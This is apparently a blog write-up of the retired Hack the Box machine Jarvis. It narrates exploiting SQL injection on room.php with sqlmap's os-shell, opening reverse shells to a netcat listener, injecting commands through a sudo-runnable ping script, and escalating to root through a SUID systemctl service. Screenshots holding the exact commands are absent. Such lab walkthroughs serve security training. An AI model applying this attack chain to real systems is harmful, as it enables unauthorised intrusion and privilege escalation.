Hack the Box — Retired Machine — Jarvis
Let us first run nmap, sparta.
Observe that ports 22 and 80 are open.
So let’s see the output of sparta or nikto to find any interesting directories.
As we see in the above image that there is a php changelog which is interesting. let us go first visit that.
There is nothing interesting but the logs show that they use mysql.
After visiting the website on port 80, visiting phpmyadmin page asks login and password. first i thought it might be a brute forcing.
then i visited normal web page and saw the page source. and there are some url like “<h3><a href=”/room.php?cod=1">Superior Family Room</a></h3>” . So i went to /room.php?cod=1
change 1 to 2 or 3 gives different type of rooms.
So i went i tried changing the number to a quote to see if it gives a sql error as below.
it does not give a error but there may be sql injection because the response is being broken because of a single quote.
so try giving the url to the sqlmap with os-shell parameter.
Andddddddddddddd bingo we got os-shell with www-data as user.
now to get the credentials f user, let’s see if there are any programs our current user can run as other user or root by below command.
this os-shell is not stable, so lets try using python command and run a shell on some port and use nc listening on kali.
now thats the pretty shell
as we see in the screenshot the current user runs the simpler.py as pepper user, lets try running simpler.py to check what it is and do cat of it.
As we see in the above image there is listing and pinging, lets cat the simpler.
see the line in the code which executes ping, which is vulnerable to command injection.
So if we make the simpler run some command places in the ping this will run under the privilege of pepper, so let’s write a test.sh file which contains netcat as below in kali or any attacker machine and wget the file into the victim as below:
Observe the error in the above image as I was trying to wget the file to Admin-Utilities folder and it was giving permission error, so try downloading the file to /tmp which will be a success.
but first change permissions of test.sh to execute because we need it to execute.
now run the simpler.py as pepper user with sudo -u option. and open netcat listener in kali on port 1235 which is given in test.sh
And for the ip ping give some wrong ip and concatenate $ and the path of the script which will do command injection and gives us shell running with pepper user privileges.
And yaaaaayyyy we got user pepper and owns flag of user.
Okay now we will try to escalate privileges to root, for this we will see the set uid functions.
We will try exploiting systemctl.
Now we will create service as shown in the below screenshot.
After this is done open a listener in kali machine, but before doing that wget the file from kali machine to the victim machine and do chmod 777 on that service file.
Enable the service, but observe we need to give the absolute path.
And there is the rooottttt
Now let us see the root flag file.